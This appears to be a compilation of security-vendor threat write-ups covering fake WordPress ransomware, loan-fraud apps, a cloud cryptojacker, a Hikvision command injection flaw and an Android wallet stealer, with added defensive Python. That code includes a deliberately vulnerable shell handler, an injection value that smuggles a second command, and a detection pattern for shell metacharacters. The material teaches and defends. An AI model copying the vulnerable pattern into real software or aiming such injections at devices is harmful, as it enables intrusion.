Websites that are infected show a warning sign on their homepage:

But this warning turned out to be bogus and is just a simple HTML page.

It also includes a simple script that adds a countdown timer, to create a sense of urgency and make it more believable.

It appears that an infected directorist_base.php was responsible for the bogus warning page. But nothing was encrypted.

directorist_base.php

Another file named “azz_encrypt.php” is referenced, but the file cannot be found on the system. Presumably, given its filename, this file could be used for encrypting the system.

azz_encrypt.php

These compromised websites suffered no serious damage; these cybercriminals just wanted a quick buck using a simple hack. However, the fact that they were able to gain access and deploy this rather effortless scheme means they could have done more damage had they used more sophisticated malware.

A quick Google search for the phrase “FOR RESTORE SEND 0.1 BITCOIN:” turns up quite a few websites infected with this malware. It appears, however, that none of the owners were scared enough to pay: the bitcoin address given in the warning has not received any payment so far.

3BkiGYFh6QtjtNCPNNjGwszoqqCka2SDEc
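The triage a site owner would want after reading the above is: which files carry the ransom note, which PHP file references a payload that is not actually on disk (azz_encrypt.php here), and whether anything was really encrypted. The script below is an added example, not SonicWall's tooling and not the attacker's code; the directory layout and file contents it scans are constructed for illustration (only the marker phrase and bitcoin address come from the post), and the "looks encrypted" test is a simple printable-byte heuristic, not a claim about the real payload.

```python
"""Triage helper for the fake-ransomware WordPress infection described above.
Added example code (not SonicWall's): walks a WordPress document root and reports
ransom-note files, PHP includes that point at a missing file, and files whose
bytes look like ciphertext rather than text.
"""
import os
import re
import tempfile

# Markers taken from the post: the note phrase and the listed bitcoin address.
NOTE_MARKERS = (
    "FOR RESTORE SEND 0.1 BITCOIN:",
    "3BkiGYFh6QtjtNCPNNjGwszoqqCka2SDEc",
)
# PHP include/require of a file by literal name; group 1 is the referenced path.
INCLUDE_RE = re.compile(
    r"\b(?:include|require)(?:_once)?\s*\(?\s*['\"]([^'\"]+\.php)['\"]")


def looks_encrypted(data: bytes) -> bool:
    """Heuristic: real ciphertext is not mostly printable ASCII. A PHP/HTML file
    that had actually been encrypted would fail this; untouched files pass."""
    if not data:
        return False
    printable = sum(1 for b in data if 32 <= b < 127 or b in (9, 10, 13))
    return printable / len(data) < 0.75


def scan_site(root: str) -> dict:
    """Return note files, (file, missing include) pairs and encrypted-looking files,
    all as paths relative to the document root."""
    findings = {"note_files": [], "missing_includes": [], "encrypted_files": []}
    for dirpath, _, files in os.walk(root):
        for name in sorted(files):
            path = os.path.join(dirpath, name)
            with open(path, "rb") as fh:
                data = fh.read()
            rel = os.path.relpath(path, root)
            if looks_encrypted(data):
                findings["encrypted_files"].append(rel)
                continue
            text = data.decode("utf-8", errors="replace")
            if any(m in text for m in NOTE_MARKERS):
                findings["note_files"].append(rel)
            if name.endswith(".php"):
                for ref in INCLUDE_RE.findall(text):
                    target = os.path.normpath(os.path.join(dirpath, ref))
                    if not os.path.exists(target):
                        findings["missing_includes"].append((rel, ref))
    return findings


def build_sample_site() -> str:
    """Constructed sample tree modelled on the post (not data from a real site):
    an injected directorist_base.php that prints the note, includes a missing
    azz_encrypt.php and adds a countdown, next to two untouched files."""
    root = tempfile.mkdtemp(prefix="wp_")
    plugin = os.path.join(root, "wp-content", "plugins", "directorist")
    os.makedirs(plugin)
    with open(os.path.join(plugin, "directorist_base.php"), "w") as fh:
        fh.write("<?php\n"
                 "require_once('azz_encrypt.php');\n"
                 "echo '<h1>SITE ENCRYPTED</h1><p>FOR RESTORE SEND 0.1 BITCOIN: "
                 "3BkiGYFh6QtjtNCPNNjGwszoqqCka2SDEc</p>';\n"
                 "echo '<script>var t=3600;setInterval(function(){t--;},1000);"
                 "</script>';\n")
    with open(os.path.join(root, "wp-config.php"), "w") as fh:
        fh.write("<?php\ndefine('DB_NAME', 'wordpress');\n"
                 "require_once('wp-settings.php');\n")
    with open(os.path.join(root, "wp-settings.php"), "w") as fh:
        fh.write("<?php\n// untouched core file\n")
    return root


if __name__ == "__main__":
    for key, val in scan_site(build_sample_site()).items():
        print(key, val)
```

Run against a real document root by calling `scan_site("/var/www/html")`; an empty `encrypted_files` list alongside a populated `note_files` list is exactly the "scary note, nothing encrypted" picture the post describes, and the missing-include entry tells you which file to pull for analysis.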

SonicWall Capture Labs provides protection against this threat via the following signature:

  • GAV:FakeWP.RSM (Trojan)

This threat is also detected by SonicWall Capture ATP w/RTDMI and the Capture Client endpoint solutions.

Fraud Apps that intimidate victims being distributed via Google Play Store

The SonicWall Capture Labs Threats Research team regularly shares information about malware threats targeting Android devices. SonicWall has tracked down a large number of financial fraud applications.

Since the start of the year, such apps have become a popular way for malware authors to make easy money, and the Google Play Store has removed hundreds of similar applications. We have observed more than 30 fraud apps in the Google Play Store; the team concerned has already been notified:

These apps target Android users in India and are portrayed as apps that help the user obtain a loan. The high installation counts (a few of these apps have 1 million+ installs) indicate that many users may have fallen prey to the fraud. Some of the app icons are shown below:

After installation, they ask for images of documents such as the Aadhaar (Unique Identification Authority of India) card and the PAN (Permanent Account Number) card, plus bank account details. The information is not validated: as shown in the image, random numbers entered as the Aadhaar number and account number were accepted and the flow proceeded:

We tried it on a device without a SIM card and it still generated an OTP, which shows that the OTP is produced by the app itself rather than by any real verification service. The following code snippet generates the fake OTP:

The fake OTP as it appears on the device is shown in the following image:

They then ask for money as a “security deposit” in Indian rupees via various payment modes, and the user never receives a loan:

Fake 5-star ratings, positive comments, and high download counts are among the reasons users fall prey to these apps:

While monitoring some of these applications during our investigation, in a couple of cases we received threatening messages on the registered mobile numbers:

As part of this campaign a victim is harmed in multiple ways:

  • Money lost as a fake loan security deposit
  • Personal data compromised
  • Advertisements
  • Threats demanding more money

SonicWall Capture Labs provides protection against this threat via the SonicWall Capture ATP w/RTDMI.

The package names of the reported apps are as follows:

Cryptojackers target servers running Alibaba Cloud

This week the SonicWall Capture Labs Research team analyzed malware samples that appear to target one of the popular cloud computing platforms, Alibaba Cloud (Aliyun). Alibaba Cloud might not be the first name that comes to mind when you think of cloud service providers, but it is the fourth largest cloud provider globally behind Amazon Web Services, Microsoft Azure and Google Cloud, and thus a very appealing target for cybercriminals. The end goal of this malware is to use the victim machine to mine cryptocurrency.

Infection cycle:

The malware arrives as a bash script. Upon execution it disables the Alibaba Cloud monitoring agent and the Cloud Assistant service. These services monitor resources and applications and raise alarms for various scenarios; disabling them lets the malware run without the owner of the victim machine being notified when a metric threshold or rule is triggered.

It then kills other processes and cryptomining services that would compete for CPU resources. These commands live in a function named “kill_miner_proc()”.

TeamTNT and Kinsing are two of the top threat groups dominating the cryptojacking arena, infiltrating vulnerable servers to run cryptominers. This malware has a function named “fuckyou()” that specifically targets processes and files known to be used by those groups, disabling them if present on the infected system. This establishes a clean slate for when the malware finally runs its own cryptominer.

It then downloads the XMRig miner and executes it.

To maintain persistence, it deletes the current crontab and adds the miner process and a copy of itself to cron.

And so the entire infection cycle repeats.

The owner of a compromised server is unlikely to notice the issue right away. Unlike ransomware, where the victim is made aware of the infection so the cybercriminal can collect, an attack like this runs quietly in the background, profits silently without demanding a ransom, and can persist for a long time.

SonicWall Capture Labs provides protection against this threat via the following signatures:

  • GAV: Coinminer.AIY (Trojan)
  • GAV: XMRig.XMR_13 (Trojan)

This threat is also detected by SonicWall Capture ATP w/RTDMI and the Capture Client endpoint solutions.

Command Injection Vulnerability in Hikvision products

Hikvision provides top-of-the-line IoT solutions and video security systems for a broad range of verticals.

Command Injection Vulnerability
The goal of a command injection attack is the execution of arbitrary commands on the host operating system via a vulnerable application. Command injection is possible when an application passes unsafe user-supplied data (forms, cookies, HTTP headers, etc.) to a system shell. The attacker-supplied operating system commands are usually executed with the privileges of the vulnerable application. Command injection attacks are possible largely due to insufficient input validation.

CVE-2021-36260
A command injection vulnerability exists in the web server of some Hikvision products. Due to insufficient input validation, an attacker can exploit it by sending messages containing malicious commands to the web server.

As seen in the example, the attacker sends a command to reboot the affected device. The attack succeeds if the attacker has access to the device’s network or the device is directly exposed to the internet.

Device firmware is affected by this vulnerability (CVE-2021-36260) if its build date is earlier than 210628. Hikvision has patched this vulnerability.
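To make the bug class concrete, the following added example (not Hikvision's code and not the exploit for CVE-2021-36260) shows a web handler in the shape the two sections above describe: a request parameter dropped into a shell command line, next to a hardened version of the same handler, plus the metacharacter check an IPS-style inspection would apply to the parameter. The "set language" handler and its `lang` parameter are made up for illustration; the handler runs `echo` so the injected command is visible but harmless, where the post's attacker sent a reboot.

```python
"""Command injection, vulnerable and hardened (added example, not Hikvision's code).
The handler name and parameter are invented for illustration.
"""
import re
import subprocess


def vulnerable_set_language(lang: str) -> str:
    # Unsafe: the parameter is interpolated into a shell command line, so shell
    # metacharacters in it (; | && ` $( )) become additional commands that run
    # with the privileges of this process.
    cmd = f"echo {lang}"
    return subprocess.run(cmd, shell=True, capture_output=True, text=True).stdout


# Allow-list: a language tag like "en" or "en-US" and nothing else.
LANG_RE = re.compile(r"^[A-Za-z]{2}(-[A-Za-z]{2})?$")


def hardened_set_language(lang: str) -> str:
    # 1) validate against an allow-list before doing anything with the value;
    # 2) never go through a shell: pass argv as a list so the value is one argument.
    if not LANG_RE.fullmatch(lang):
        raise ValueError(f"rejected language value: {lang!r}")
    return subprocess.run(["echo", lang], capture_output=True, text=True).stdout


def is_rejected(lang: str) -> bool:
    """True if the hardened handler refuses the value."""
    try:
        hardened_set_language(lang)
    except ValueError:
        return True
    return False


# What a network-side check looks for in request parameters bound for a shell.
SHELL_META = re.compile(r"[;&|`\n]|\$\(|\$\{")


def contains_shell_meta(value: str) -> bool:
    return SHELL_META.search(value) is not None


if __name__ == "__main__":
    payload = "en; echo INJECTED"
    print(vulnerable_set_language(payload), end="")  # prints "en" then "INJECTED"
    print(contains_shell_meta(payload))               # True
    print(is_rejected(payload))                       # True
    print(hardened_set_language("en-US"), end="")     # prints "en-US"
```

The hardened version relies on both measures: the allow-list rejects the payload outright, and even if validation were incomplete the argv-list form hands the whole string to `echo` as a single argument, so no second command can be spliced in.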

SonicWall Capture Labs provides protection against this threat via following signatures:

    • IPS 15701: Hikvision IP Camera Command Injection

Threat Graph

An Android crypto wallet stealer

With the rise in popularity of and investment in cryptocurrency there has been a rise in crypto-related scams as well. The SonicWall Threats Research team identified a malicious Android application that steals crypto wallets.

Initial Activity

Upon installation and execution, the app asks the user to grant it Accessibility Services:

The app needs this permission so that it can perform clicks in the background on behalf of the user. This is the modus operandi the app uses to steal crypto wallets from the targeted wallet app, com.wallet.crypto.trustapp.

Accessibility Services

To gain the user’s trust and convince them to grant Accessibility Services, the malware shows the user an explanation:

The malware registers a service, com.test.accessibility.MyAccessibilityService, that contains a number of interesting elements:

  • Hardcoded server URL – http://159.69.139.252:999

  • Code for communicating with a Telegram bot

  • A number of strings referring to the target wallet app (com.wallet.crypto) that identify the different components of the legitimate crypto wallet app

  • performAction(16) appears in several places in the code. The value 16 is AccessibilityNodeInfo.ACTION_CLICK, which performs a ‘click’ or ‘touch’ on a mobile device, so these calls are intended to press buttons. Accessibility Services allow an application to perform such clicks in the background without the user’s knowledge

Overall this malware is a crypto wallet stealer with a single target app, one that is quite popular on the Google Play Store. With the rise in crypto investments we expect more such malicious apps and scams to surface in the near future.
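The indicators listed above (an accessibility service in the manifest, a hardcoded raw-IP server, Telegram bot traffic, the target wallet package, and repeated performAction(16) calls) are exactly what a static triage of a suspect APK should pull out. The script below is an added example, not SonicWall's tooling and not the malware: it takes a decoded AndroidManifest.xml and a list of strings such as apktool or jadx would extract, so it runs offline. The sample manifest and strings are constructed to mirror the post's observations; the package name `com.test.accessibility` is inferred from the service name the post gives, and the Telegram URL string is an assumed form of "communication with a Telegram bot", not a string quoted from the sample.

```python
"""Static triage for the accessibility-abuse wallet stealer pattern described above
(added example code, not SonicWall's and not the malware). Inputs: decoded manifest
XML and extracted strings; both samples below are constructed.
"""
import re
import xml.etree.ElementTree as ET

ANDROID_NS = "http://schemas.android.com/apk/res/android"
ACCESSIBILITY_PERM = "android.permission.BIND_ACCESSIBILITY_SERVICE"
ACTION_CLICK = 16  # AccessibilityNodeInfo.ACTION_CLICK, i.e. performAction(16)

RAW_IP_URL = re.compile(r"https?://\d{1,3}(?:\.\d{1,3}){3}(?::\d+)?")
TELEGRAM_BOT = re.compile(r"api\.telegram\.org/bot")
PERFORM_CLICK = re.compile(r"performAction\(\s*%d\s*\)" % ACTION_CLICK)


def accessibility_services(manifest_xml: str) -> list:
    """Fully qualified names of services bound with the accessibility permission,
    i.e. components that can read the screen and click on the user's behalf."""
    root = ET.fromstring(manifest_xml)
    pkg = root.get("package", "")
    found = []
    for svc in root.iter("service"):
        if svc.get(f"{{{ANDROID_NS}}}permission") == ACCESSIBILITY_PERM:
            name = svc.get(f"{{{ANDROID_NS}}}name", "")
            found.append(pkg + name if name.startswith(".") else name)
    return found


def c2_indicators(strings: list) -> dict:
    """Hardcoded raw-IP endpoints, Telegram bot API use, and click call sites."""
    return {
        "raw_ip_urls": sorted({m.group(0) for s in strings for m in RAW_IP_URL.finditer(s)}),
        "telegram_bot": any(TELEGRAM_BOT.search(s) for s in strings),
        "click_sites": sum(1 for s in strings if PERFORM_CLICK.search(s)),
    }


def targeted_packages(strings: list, watchlist: tuple) -> list:
    """Which watch-listed package names the app's strings reference."""
    return [p for p in watchlist if any(p in s for s in strings)]


def triage(manifest_xml: str, strings: list,
           watchlist: tuple = ("com.wallet.crypto.trustapp",)) -> dict:
    svcs = accessibility_services(manifest_xml)
    ind = c2_indicators(strings)
    targets = targeted_packages(strings, watchlist)
    # One point each for: accessibility service, a C2 channel, a named wallet target.
    score = int(bool(svcs)) + int(bool(ind["raw_ip_urls"] or ind["telegram_bot"])) \
        + int(bool(targets))
    return {"accessibility_services": svcs, **ind, "targets": targets, "score": score}


# Constructed sample manifest; package name inferred from the post's service name.
SAMPLE_MANIFEST = """<?xml version="1.0" encoding="utf-8"?>
<manifest xmlns:android="http://schemas.android.com/apk/res/android"
          package="com.test.accessibility">
  <application>
    <service android:name=".MyAccessibilityService"
             android:permission="android.permission.BIND_ACCESSIBILITY_SERVICE">
      <intent-filter>
        <action android:name="android.accessibilityservice.AccessibilityService"/>
      </intent-filter>
    </service>
  </application>
</manifest>
"""

# Constructed sample strings; the IP URL and target package are from the post,
# the Telegram URL is an assumed form, the rest is filler.
SAMPLE_STRINGS = [
    "http://159.69.139.252:999",
    "https://api.telegram.org/bot",
    "com.wallet.crypto.trustapp",
    "node.performAction(16);",
    "node.performAction(16);",
    "https://example.com/privacy",
]

if __name__ == "__main__":
    for key, val in triage(SAMPLE_MANIFEST, SAMPLE_STRINGS).items():
        print(key, val)
```

A score of 3 reproduces the post's finding; the watchlist can be extended with other wallet or banking package names to catch the same technique aimed at a different target.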

 

SonicWall Capture Labs provides protection against this threat using the signature listed below:

  • AndroidOS.CryptoStealer.HT